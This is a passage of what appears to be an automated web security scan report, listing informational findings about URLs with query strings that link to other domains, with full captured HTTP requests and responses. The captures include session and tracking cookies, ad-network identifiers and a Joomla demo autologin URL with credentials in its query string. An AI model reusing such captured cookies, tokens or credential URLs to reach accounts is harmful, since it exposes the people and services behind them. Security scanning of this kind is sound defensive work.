<div id="imgget" style="display:none"><img id="g_cl_0" src="http://lh3.googleusercontent.com/public/DuDM0CT123W36igs4zJepftyh8RldEFYrOK6Oc6P6pNmWEY--A2PC4qLe_7N3_kYD9TYNw0NMGZZbFMxu46J1W5ca01aZWDehXvsCSuEE_ta5UFMcZkwYwSMPt-EZkMjjoWgpfxa8o8UB7erdODMEOknKRfhsPvdte-SJw"/><img id="g_cl_1" src="http://lh4.googleusercontent.com/public/A43LCN0NDvgM4wAqrRNRm7dKS_SD0o5ql9xU0fDputQ5OEsA5hgN5NRU53RIt6INrrdrlo9zECwkVvw7Nkl4JgvJ3h9xyiqcT_G6KEHnQgld05O076YZam2nTMV-3225j1lbmtL8jPAaUUEcsncbPwEKKldJZ3CIlzVaQq4RBarCMcdoTD0ucg"/><img id="g_cl_2" src="http://lh6.googleusercontent.com/public/nxFKhPHGNDUck_cr0eQYa_fkGp-TFkxb_VBRbdz_Rr0sygdCPIpjKJy5ll-I1nzdWT_Qfy-yBOfKyN2xo8-Ax8V22mq4xZDD0NHR9Z-g2V_8DqjE3oiA7DZUZKxAShbdhZjSu4Gan_L7yDJbrjegpixyMkIwFqf_d475A6QEi8cDqvNlDkqwsherAY08iLbZ"/><img id="g_cl_3" src="http://lh6.googleusercontent.com/public/1QOVqIRs_50A1jAPmksVqpEMSa7pnU0uJdjBNcd5_U3AJRVEybPcHWW8pSBc3sLiRRhDGXmT-nEM3DOrutmTaCR1XxjTSKxuALWVqz1AVlMN5xcj_EILpYIw4Q2etSFFZ7vYxNDM1gzY8FCDdW4"/><img id="g_cl_4" src="http://lh5.googleusercontent.com/public/n9GoxfDAW1w4hdTScCr4NoTYH2s1_68Ko11sakGJEBUq5ciNC0-6QyP-zDqHtyz6OPCoWaF-CdajDKf8CQeWkQJn71lq6mX9cIIXHwLdZFP96qeoRdIPvNh3vAe98TI_Bfre-od7gkNXpavXYzCGPv6w74yX4A"/></div>
...[SNIP]...

20.19. http://books.google.com/bkshp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/bkshp

Issue detail

The page was loaded from a URL containing a query string:

http://books.google.com/bkshp?hl=en&tab=wp

The response contains the following links to other domains:

http://booksearch.blogspot.com/
http://www.youtube.com/?hl=en&tab=p1

Request

GET /bkshp?hl=en&tab=wp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:53 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=3662ef10c1c20227:TM=1295881313:LM=1295881313:S=QtqU5B45uNZLLVuG; expires=Wed, 23-Jan-2013 15:01:53 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=p1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a> - <a href=http://booksearch.blogspot.com/><nobr>
...[SNIP]...

20.20. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Issue detail

The page was loaded from a URL containing a query string:

https://bugzilla.mozilla.org/show_bug.cgi?id=378962

The response contains the following link to another domain:

https://bugzil.la/378962

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.21. http://cdn.apture.com/media/app.khtml.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.apture.com
Path:	/media/app.khtml.js

Issue detail

The page was loaded from a URL containing a query string:

http://cdn.apture.com/media/app.khtml.js?v=21531601

The response contains the following link to another domain:

http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash

Request

GET /media/app.khtml.js?v=21531601 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Referer: http://cdn.apture.com/media/html/aptureLoadIframe.html?v=21531601
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=nbrlsqWMpk

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:42 GMT
Server: PWS/1.7.1.2
X-Px: ht iad-agg-n30.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Sat, 29 Jan 2011 02:07:27 GMT
Age: 241455
Content-Type: application/x-javascript
Vary: Accept-Encoding
Px-Uncompress-Origin: 259543
Last-Modified: Sat, 22 Jan 2011 02:03:10 GMT
Connection: keep-alive
Content-Length: 259543

apture.fileCache.load("app", "(function(){function t(){return null}function P(a,d){return function(){var g=this.parent;this.parent=d;var i=a.apply(this,arguments);this.parent=g;return i}}function b(a,
...[SNIP]...
<p class='aptureNeedFlash'>To continue, install the latest version of <a target=\\\"installFlash\\\" href='http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash'>Adobe Flash Player</a>
...[SNIP]...

20.22. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Issue detail

The page was loaded from a URL containing a query string:

http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5875.270604.B3/B5111946.91;abr=!ie4;abr=!ie5;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
http://ad.doubleclick.net/adj/N5875.270604.B3/B5111946.91;abr=!ie;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
http://ad.doubleclick.net/jump/N5875.270604.B3/B5111946.91;abr=!ie4;abr=!ie5;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT
Cneonction: close
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 01:06:57 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1336

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg" /></div>
<IFRAME SRC="http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?" WIDTH=120 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5875.270604.B3/B5111946.91;abr=!ie;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N5875.270604.B3/B5111946.91;abr=!ie4;abr=!ie5;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?">
<IMG SRC="http://ad.doubleclick.net/ad/N5875.270604.B3/B5111946.91;abr=!ie4;abr=!ie5;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?" BORDER=0 WIDTH=120 HEIGHT=600 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME><IFRAME SRC='http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90' WIDTH=0 HEIGHT=0 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></IFRAME>
...[SNIP]...

20.23. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=bluekai&

The response contains the following link to another domain:

http://tags.bluekai.com/site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&cver=1&

Request

GET /pixel?nid=bluekai& HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Found
Location: http://tags.bluekai.com/site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&cver=1&
Date: Mon, 24 Jan 2011 21:07:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 277
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tags.bluekai.com/site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&cver=1&">here</A>
...[SNIP]...

20.24. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=turn1

The response contains the following link to another domain:

http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESED6m9hESeuo-2i0GmZeSEfo&cver=1

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=4&mpid=1051202&fpid=3&rnd=3797505172801460594&nu=n&sp=y
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESED6m9hESeuo-2i0GmZeSEfo&cver=1
Date: Tue, 25 Jan 2011 01:35:46 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESED6m9hESeuo-2i0GmZeSEfo&cver=1">here</A>
...[SNIP]...

20.25. http://cms.ad.yieldmanager.net/v1/cms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.ad.yieldmanager.net
Path:	/v1/cms

Issue detail

The page was loaded from a URL containing a query string:

http://cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578

The response contains the following link to another domain:

http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http:/cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578

Request

GET /v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578 HTTP/1.1
Host: cms.ad.yieldmanager.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:31:00 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 411

The document has moved <A HREF="http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578">here</A>
...[SNIP]...

20.26. http://content.worldnow.com/global/tools/video/WNVideoCodebase_v2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.worldnow.com
Path:	/global/tools/video/WNVideoCodebase_v2.js

Issue detail

The page was loaded from a URL containing a query string:

http://content.worldnow.com/global/tools/video/WNVideoCodebase_v2.js?ver=201010090400

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /global/tools/video/WNVideoCodebase_v2.js?ver=201010090400 HTTP/1.1
Host: content.worldnow.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 11 Dec 2010 12:12:27 GMT
ETag: "803339ad2c99cb1:a79"
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 21:54:42 GMT
Date: Mon, 24 Jan 2011 21:54:42 GMT
Connection: close
Content-Length: 226851

if(!window.Silverlight)
{window.Silverlight={};}
Silverlight._silverlightCount=0;Silverlight.fwlinkRoot='http://go2.microsoft.com/fwlink/?LinkID=';Silverlight.onGetSilverlight=null;Silverlight.onSil
...[SNIP]...
;if(this.widgetClassType=="WNVideoCanvas"||this.widgetClassType=="WNGallery"||this.widgetClassType=="WNVideoCanvas2"||this.widgetClassType=="WNImageCanvas"||this.widgetClassType=="WNImageGallery"){f+='<a style="color:#333;text-decoration:none;" href="http://www.macromedia.com/go/getflash/" target="_blank">You need to download the latest version of flash player to use this player</a>
...[SNIP]...

20.27. http://d1.openx.org/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280

The response contains the following links to other domains:

http://ads.dailystar.com.lb/www/delivery/afr.php?zoneid=64&target=_blank&cb=658
http://ads.dailystar.com.lb/www/delivery/avw.php?zoneid=64&cb=658;n=acbb9396
http://ads.dailystar.com.lb/www/delivery/ck.php?n=acbb9396&cb=658

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:21:31 GMT; path=/
Set-Cookie: OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434140%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; path=/
Content-Length: 1287
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<body>
<iframe id='a0157b25' name='a0157b25' src='http://ads.dailystar.com.lb/www/delivery/afr.php?zoneid=64&target=_blank&cb=658' frameborder='0' scrolling='no' width='728' height='90'><a href='http://ads.dailystar.com.lb/www/delivery/ck.php?n=acbb9396&cb=658' target='_blank'><img src='http://ads.dailystar.com.lb/www/delivery/avw.php?zoneid=64&cb=658;n=acbb9396' border='0' alt='' /></a>
...[SNIP]...

20.28. http://d1.openx.org/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280

The response contains the following link to another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

20.29. http://demo.joomla.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo.joomla.org
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://demo.joomla.org/index.php?format=feed&type=rss

The response contains the following links to other domains:

http://demo16.cloudaccess.net/
http://demo16.cloudaccess.net/administrator/index.php?autologin=1&username=demo&password=demo
https://www.cloudaccess.net/my-cloud-panel.html

Request

GET /index.php?format=feed&type=rss HTTP/1.1
Host: demo.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utma=228838275.529671353.1295835725.1295835725.1295835725.1; __utmc=228838275; __utmb=228838275.1.10.1295835725;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:25:11 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:25:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 8770

<?xml version="1.0" encoding="utf-8"?>

<?xml-stylesheet href="/plugins/system/jceutilities/css/jceutilities.css?v=224" type="text/css"
...[SNIP]...
<li><a class="backendLink" href="http://demo16.cloudaccess.net/administrator/index.php?autologin=1&username=demo&password=demo">See Backend</a>
...[SNIP]...
<li><a class="frontendLink" href="http://demo16.cloudaccess.net/">See Frontend</a>
...[SNIP]...
</a>. If you've registered already and need support, please <a title="submit a support ticket" id="z.:x" href="https://www.cloudaccess.net/my-cloud-panel.html">submit a support ticket</a>
...[SNIP]...

20.30. http://demo16.cloudaccess.net/administrator/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo16.cloudaccess.net
Path:	/administrator/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://demo16.cloudaccess.net/administrator/index.php?autologin=1&username=demo&password=demo

The response contains the following links to other domains:

http://community.joomla.org/
http://community.joomla.org/translations.html
http://developer.joomla.org/
http://developer.joomla.org/security.html
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://resources.joomla.org/
http://shop.joomla.org/
http://www.gnu.org/licenses/gpl-2.0.html
http://www.joomla.org/

Request

GET /administrator/index.php?autologin=1&username=demo&password=demo HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 3cd367566174a1f3a2f806869f69204d=qj4rsnti4a7bh3lrglpkp0bap3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<span class="logo"><a href="http://www.joomla.org" target="_blank"><img src="templates/bluestork/images/logo.png" alt="Joomla!" />
...[SNIP]...
<li><a class="icon-16-help-forum" href="http://forum.joomla.org" target="_blank" >Support Forum</a>
...[SNIP]...
<li><a class="icon-16-help-docs" href="http://docs.joomla.org" target="_blank" >Documentation Wiki</a>
...[SNIP]...
<li><a class="icon-16-help-jed" href="http://extensions.joomla.org" target="_blank" >Joomla Extensions</a>
...[SNIP]...
<li><a class="icon-16-help-trans" href="http://community.joomla.org/translations.html" target="_blank" >Joomla Translations</a>
...[SNIP]...
<li><a class="icon-16-help-jrd" href="http://resources.joomla.org" target="_blank" >Joomla Resources</a>
...[SNIP]...
<li><a class="icon-16-help-community" href="http://community.joomla.org" target="_blank" >Community Portal</a>
...[SNIP]...
<li><a class="icon-16-help-security" href="http://developer.joomla.org/security.html" target="_blank" >Security Center</a>
...[SNIP]...
<li><a class="icon-16-help-dev" href="http://developer.joomla.org" target="_blank" >Developer Resources</a>
...[SNIP]...
<li><a class="icon-16-help-shop" href="http://shop.joomla.org" target="_blank" >Joomla Shop</a>
...[SNIP]...
<p class="copyright">
<a href="http://www.joomla.org">Joomla!®</a> is free software released under the <a href="http://www.gnu.org/licenses/gpl-2.0.html">GNU General Public License</a>
...[SNIP]...

20.31. http://disqus.com/forums/integrations/twitter/tweetbox.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/forums/integrations/twitter/tweetbox.html

Issue detail

The page was loaded from a URL containing a query string:

http://disqus.com/forums/integrations/twitter/tweetbox.html?f=7newsboston

The response contains the following link to another domain:

http://platform.twitter.com/anywhere.js?id=mAlbTY9QWAGj6rWXxK8xg&v=1

Request

GET /forums/integrations/twitter/tweetbox.html?f=7newsboston HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1002

<!DOCTYPE html>

<html>
<head>
<meta charse="utf-8">
<title></title>

<script src="http://platform.twitter.com/anywhere.js?id=mAlbTY9QWAGj6rWXxK8xg&v=1">
</script>

<script src
...[SNIP]...

20.32. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1596198292@x23

Issue detail

The page was loaded from a URL containing a query string:

http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120

The response contains the following links to other domains:

http://a.tribalfusion.com/i.cid?c=345683&d=30&page=landingPage
http://action.mathtag.com/mm/RSHA/red?nm=NoSRemar&s0=&s1=&s2=&v0=&v1=&v2=&ri=%n
http://action.media6degrees.com/orbserv/hbpix?pixId=4548&pcv=47
http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=38638;sz=1x1;ord=1?
http://ad.yieldmanager.com/pixel?id=1082184&t=2
http://ad.yieldmanager.com/pixel?id=906283&id=906282&id=103817&t=2
http://at.amgdgt.com/ads/?t=pp&px=10660&rnd=1975009456
